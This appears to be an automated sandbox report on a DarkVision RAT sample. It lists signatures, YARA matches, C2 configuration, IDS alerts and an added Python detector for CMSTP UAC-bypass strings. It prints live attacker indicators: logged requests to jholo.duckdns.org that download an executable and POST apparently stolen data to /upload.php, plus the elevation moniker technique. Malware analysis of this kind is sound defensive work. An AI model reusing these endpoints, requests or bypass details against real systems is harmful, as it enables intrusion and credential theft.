
Windows Analysis Report
uncrypted.exe

Overview

General Information

Sample name: uncrypted.exe
Analysis ID: 1582630
MD5: 84e8a17e39ef16dce73da924ced012d5
SHA1: 630f2eb6046e05450c10af2a4ae01840e0a19405
SHA256: bebe3cadd1d51412d055ba11ebc64091c45e2ef47dbcc7135d2d762f26a466c2
Tags: exe, user-lontze7

Detection

DarkVision Rat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal saved passwords of Firefox
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Searches for specific processes (likely to inject)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Remote Thread Creation By Uncommon Source Image
Stores large binary data to the registry
Terminates after testing mutex exists (may check infected machine status)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • uncrypted.exe (PID: 3856 cmdline: "C:\Users\user\Desktop\uncrypted.exe" MD5: 84E8A17E39EF16DCE73DA924CED012D5)
    • uncrypted.exe (PID: 2892 cmdline: "C:\Users\user\Desktop\uncrypted.exe" MD5: 84E8A17E39EF16DCE73DA924CED012D5)
      • explorer.exe (PID: 5060 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
        • explorer.exe (PID: 5032 cmdline: C:\Windows\EXPLORER.EXE {2046C745-B848-47EE-8068-B039EAC15A1C} MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
{"C2": "jholo.duckdns.org", "Port": 8900}
Source | Rule | Description | Author | Strings
00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000000.00000002.2055171521.00000000040F9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
(5 of 16 memory-dump matches shown)
Source | Rule | Description | Author | Strings
2.2.uncrypted.exe.400000.0.raw.unpack | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
2.2.uncrypted.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
2.2.uncrypted.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x34588:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x344c8:$s1: CoGetObject
  • 0x34550:$s2: Elevation:Administrator!new:
2.2.uncrypted.exe.11edea0.1.raw.unpack | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
2.2.uncrypted.exe.11edea0.1.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
(5 of 20 unpacked-PE matches shown)
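The three strings behind the INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM hit are the CMSTPLUA CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7}, the CoGetObject import name and the "Elevation:Administrator!new:" moniker prefix that auto-elevates a COM class. The following is an added example, not part of the Joe Sandbox report or of the ditekSHen rule set: a plain-Python scanner that applies the same string logic to a byte buffer, searching each string in ASCII and UTF-16LE the way a YARA `ascii wide` string is searched, and that pulls out the complete moniker so the targeted CLSID is visible. The requirement that the buffer start with "MZ" and contain all three strings is this example's own assumption about the rule condition, and the sample buffers are constructed here.

```python
"""Added example; not code from the Joe Sandbox report or the ditekSHen rule set.
Re-implements the string logic of INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM as the
report shows it. The 'MZ' + all-three-strings condition is an assumption."""
import re
from typing import Dict, List, Tuple

# The three strings the report lists for the rule.
INDICATORS: Dict[str, bytes] = {
    "guid1": b"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",
    "s1": b"CoGetObject",
    "s2": b"Elevation:Administrator!new:",
}


def _forms(s: bytes) -> Dict[str, bytes]:
    """ASCII and UTF-16LE ('wide') encodings of one indicator string."""
    return {"ascii": s, "wide": s.decode("ascii").encode("utf-16-le")}


def find_indicators(buf: bytes) -> Dict[str, List[Tuple[int, str]]]:
    """Map each indicator name to its (offset, encoding) hits in buf."""
    hits: Dict[str, List[Tuple[int, str]]] = {}
    for name, raw in INDICATORS.items():
        for enc, needle in _forms(raw).items():
            for m in re.finditer(re.escape(needle), buf):
                hits.setdefault(name, []).append((m.start(), enc))
    return hits


def is_cmstp_uac_bypass_candidate(buf: bytes) -> bool:
    """Assumed rule condition: a PE image ('MZ') carrying all three strings."""
    return buf[:2] == b"MZ" and set(find_indicators(buf)) == set(INDICATORS)


def extract_elevation_monikers(buf: bytes) -> List[str]:
    """Return every NUL-terminated string that starts with the moniker prefix,
    e.g. 'Elevation:Administrator!new:{CLSID}', so the targeted class is visible."""
    out: List[str] = []
    for enc, needle in _forms(INDICATORS["s2"]).items():
        for m in re.finditer(re.escape(needle), buf):
            end = m.start()
            if enc == "wide":
                # advance one UTF-16 code unit at a time until the 00 00 terminator
                while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":
                    end += 2
                out.append(buf[m.start():end].decode("utf-16-le", errors="replace"))
            else:
                nul = buf.find(b"\x00", m.start())
                end = len(buf) if nul == -1 else nul
                out.append(buf[m.start():end].decode("ascii", errors="replace"))
    return out


# Constructed sample: a minimal 'MZ' prefix followed by the indicator strings laid
# out as a compiler would place them in .rdata (ASCII CLSID and import name,
# UTF-16LE moniker). This is not a real executable.
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + b".rdata\x00\x00"
    + b"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\x00"
    + b"CoGetObject\x00"
    + "Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}".encode("utf-16-le")
    + b"\x00\x00"
    + b"\x00" * 16
)
# Constructed benign-looking buffer: uses COM but carries no elevation moniker.
BENIGN = b"MZ" + b"\x00" * 62 + b"CoGetObject\x00CoCreateInstance\x00"

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE), ("benign", BENIGN)):
        print(label, is_cmstp_uac_bypass_candidate(blob), find_indicators(blob))
    print(extract_elevation_monikers(SAMPLE))
```

CoGetObject alone is a normal COM import, so the hit that matters is the moniker prefix next to the CMSTPLUA CLSID; in this sample the moniker is stored pre-built, whereas the report's wsprintfW chains suggest the RAT may assemble it at run time, in which case only the prefix and the CLSID appear as separate strings and `find_indicators` still reports both.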

                    System Summary

Source: Threat created | Author: Perez Diego (@darkquassar), oscd.community | Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 5060, StartAddress: 790000, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 5032
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-31T07:33:04.802221+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 5.89.185.156 | 8900 | TCP
2024-12-31T07:33:13.838339+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 5.89.185.156 | 8900 | TCP
2024-12-31T07:33:22.853752+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.5 | 49720 | 5.89.185.156 | 8900 | TCP
2024-12-31T07:33:31.892912+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.5 | 49781 | 5.89.185.156 | 8900 | TCP
2024-12-31T07:33:40.927898+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.5 | 49837 | 5.89.185.156 | 8900 | TCP
2024-12-31T07:33:49.983774+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.5 | 49898 | 5.89.185.156 | 8900 | TCP
2024-12-31T07:33:58.994424+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.5 | 49960 | 5.89.185.156 | 8900 | TCP
2024-12-31T07:34:08.143325+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.5 | 49985 | 5.89.185.156 | 8900 | TCP
2024-12-31T07:34:17.166204+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.5 | 49986 | 5.89.185.156 | 8900 | TCP
2024-12-31T07:34:26.197336+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.5 | 49987 | 5.89.185.156 | 8900 | TCP
2024-12-31T07:34:35.228839+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.5 | 49988 | 5.89.185.156 | 8900 | TCP
2024-12-31T07:34:44.244638+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.5 | 49989 | 5.89.185.156 | 8900 | TCP
2024-12-31T07:34:53.025515+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.5 | 49990 | 5.89.185.156 | 8900 | TCP
2024-12-31T07:35:01.478246+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.5 | 49991 | 5.89.185.156 | 8900 | TCP

                    AV Detection

Source: uncrypted.exe | Avira: detected
Source: 3.2.explorer.exe.1190000.0.unpack | Malware Configuration Extractor: DarkVision Rat {"C2": "jholo.duckdns.org", "Port": 8900}
Source: uncrypted.exe | Virustotal: Detection: 61%
Source: uncrypted.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: uncrypted.exe | Joe Sandbox ML: detected
Source: C:\Windows\explorer.exe | Code function: 3_2_011953B0 LocalAlloc,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,CryptBinaryToStringW,CryptBinaryToStringW,lstrcpyW,LocalFree,WaitForSingleObject,RtlExitUserThread,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,3_2_011953B0
Source: C:\Windows\explorer.exe | Code function: 3_2_011ADC00 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,3_2_011ADC00
Source: C:\Windows\explorer.exe | Code function: 3_2_011ADD1E CryptReleaseContext,CryptDestroyHash,3_2_011ADD1E
Source: C:\Windows\explorer.exe | Code function: 3_2_011ADD5A CryptReleaseContext,CryptDestroyHash,3_2_011ADD5A
Source: C:\Windows\explorer.exe | Code function: 3_2_011ADD8F CryptReleaseContext,CryptDestroyHash,3_2_011ADD8F
Source: C:\Windows\explorer.exe | Code function: 3_2_011ADCF7 CryptReleaseContext,CryptDestroyHash,3_2_011ADCF7
Source: C:\Windows\explorer.exe | Code function: 4_2_00E751C0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,4_2_00E751C0
Source: C:\Windows\explorer.exe | Code function: 4_2_00E7A390 LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,4_2_00E7A390
Source: C:\Windows\explorer.exe | Code function: 4_2_00E754C0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,4_2_00E754C0
Source: C:\Windows\explorer.exe | Code function: 4_2_00E748C0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,4_2_00E748C0
Source: C:\Windows\explorer.exe | Code function: 4_2_00E799B0 CryptBinaryToStringW,RegGetValueW,4_2_00E799B0
Source: C:\Windows\explorer.exe | Code function: 4_2_00E79AE0 CryptBinaryToStringW,RegOpenKeyW,RegSetValueExW,RegCloseKey,RegCloseKey,4_2_00E79AE0
Source: C:\Windows\explorer.exe | Code function: 4_2_00E74BC0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,4_2_00E74BC0
Source: C:\Windows\explorer.exe | Code function: 4_2_00E79C20 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,4_2_00E79C20
Source: C:\Windows\explorer.exe | Code function: 4_2_00E76D60 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,lstrlenW,LocalFree,LocalFree,4_2_00E76D60
Source: C:\Windows\explorer.exe | Code function: 4_2_00E74EC0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,4_2_00E74EC0
Source: C:\Windows\explorer.exe | Code function: 4_2_00E76530 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,4_2_00E76530
Source: C:\Windows\explorer.exe | Code function: 4_2_00E7A690 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,LocalFree,4_2_00E7A690
Source: C:\Windows\explorer.exe | Code function: 4_2_00E79DAF CryptReleaseContext,CryptDestroyHash,4_2_00E79DAF
Source: C:\Windows\explorer.exe | Code function: 4_2_00E73D60 CryptStringToBinaryA,4_2_00E73D60
Source: C:\Windows\explorer.exe | Code function: 4_2_00E79D7A CryptReleaseContext,CryptDestroyHash,4_2_00E79D7A
Source: C:\Windows\explorer.exe | Code function: 4_2_00E79D3E CryptReleaseContext,CryptDestroyHash,4_2_00E79D3E
Source: C:\Windows\explorer.exe | Code function: 4_2_00E75D00 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,4_2_00E75D00
Source: C:\Windows\explorer.exe | Code function: 4_2_00E79D17 CryptReleaseContext,CryptDestroyHash,4_2_00E79D17

                    Exploits

Source: Yara match | File source: 2.2.uncrypted.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.uncrypted.exe.11edea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.uncrypted.exe.4081f90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.uncrypted.exe.11edea0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.uncrypted.exe.41021c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.explorer.exe.1190000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.uncrypted.exe.4081f90.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.uncrypted.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.uncrypted.exe.41021c0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2055171521.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2055171521.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2041385974.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2054936122.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: uncrypted.exe PID: 3856, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: uncrypted.exe PID: 2892, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5060, type: MEMORYSTR

                    Compliance

Source: C:\Users\user\Desktop\uncrypted.exe | Unpacked PE file: 0.2.uncrypted.exe.9a0000.0.unpack
Source: uncrypted.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: uncrypted.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_0041DB70 WaitForSingleObject,LocalAlloc,LocalAlloc,FindFirstFileW,WaitForSingleObject,lstrcmpW,lstrcmpW,LocalAlloc,RemoveDirectoryW,GetLastError,LocalFree,DeleteFileW,FindNextFileW,FindClose,GetLastError,LocalFree,LocalFree,2_2_0041DB70
Source: C:\Windows\explorer.exe | Code function: 3_2_011997F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,3_2_011997F0
Source: C:\Windows\explorer.exe | Code function: 4_2_00E77EA0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,4_2_00E77EA0

                    Networking

Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49707 -> 5.89.185.156:8900
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49720 -> 5.89.185.156:8900
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49781 -> 5.89.185.156:8900
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49837 -> 5.89.185.156:8900
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49898 -> 5.89.185.156:8900
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49960 -> 5.89.185.156:8900
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49986 -> 5.89.185.156:8900
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49987 -> 5.89.185.156:8900
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49989 -> 5.89.185.156:8900
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49991 -> 5.89.185.156:8900
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49985 -> 5.89.185.156:8900
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49990 -> 5.89.185.156:8900
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49988 -> 5.89.185.156:8900
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49706 -> 5.89.185.156:8900
Source: C:\Windows\explorer.exe | Network Connect: 5.89.185.156 8181
Source: Malware configuration extractor | URLs: jholo.duckdns.org
Source: unknown | DNS query: name: jholo.duckdns.org
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 8181
Source: unknown | Network traffic detected: HTTP traffic on port 8181 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 8181
Source: unknown | Network traffic detected: HTTP traffic on port 8181 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 8181
Source: unknown | Network traffic detected: HTTP traffic on port 8181 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 8181
Source: unknown | Network traffic detected: HTTP traffic on port 8181 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 8181
Source: unknown | Network traffic detected: HTTP traffic on port 8181 -> 49705
Source: global traffic | TCP traffic: 192.168.2.5:49704 -> 5.89.185.156:8181
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 31 Dec 2024 06:33:02 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 11 Nov 2024 02:14:28 GMTETag: "f9600-62699a90923c5"Accept-Ranges: bytesContent-Length: 1021440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 c8 8b 75 ed a9 e5 26 ed a9 e5 26 ed a9 e5 26 f6 34 7b 26 e7 a9 e5 26 e4 d1 62 26 ec a9 e5 26 e4 d1 76 26 fc a9 e5 26 ed a9 e4 26 72 a9 e5 26 f6 34 4e 26 d9 a9 e5 26 f6 34 4f 26 90 a9 e5 26 f6 34 78 26 ec a9 e5 26 52 69 63 68 ed a9 e5 26 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 84 68 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 44 0d 00 00 b6 02 00 00 00 00 00 b8 49 0c 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 10 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 6e 0e 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 a0 0f 00 40 65 00 00 00 00 00 00 00 00 00 00 00 10 10 00 08 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0d 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 42 0d 00 00 10 00 00 00 44 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 1f 01 00 00 60 0d 00 00 20 01 
00 00 48 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 10 13 01 00 00 80 0e 00 00 ac 00 00 00 68 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 40 65 00 00 00 a0 0f 00 00 66 00 00 00 14 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 9a 1a 00 00 00 10 10 00 00 1c 00 00 00 7a 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: Joe Sandbox View | ASN Name: VODAFONE-IT-ASNIT
Source: global traffic | HTTP traffic detected: GET /PASSWORDRECOVERY64EXE.EXE HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Host: jholo.duckdns.org:8181
Source: global traffic | HTTP traffic detected: POST /upload.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=part | Host: jholo.duckdns.org | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Content-Length: 422
Source: global traffic | HTTP traffic detected: POST /upload.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=part | Host: jholo.duckdns.org | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Content-Length: 417
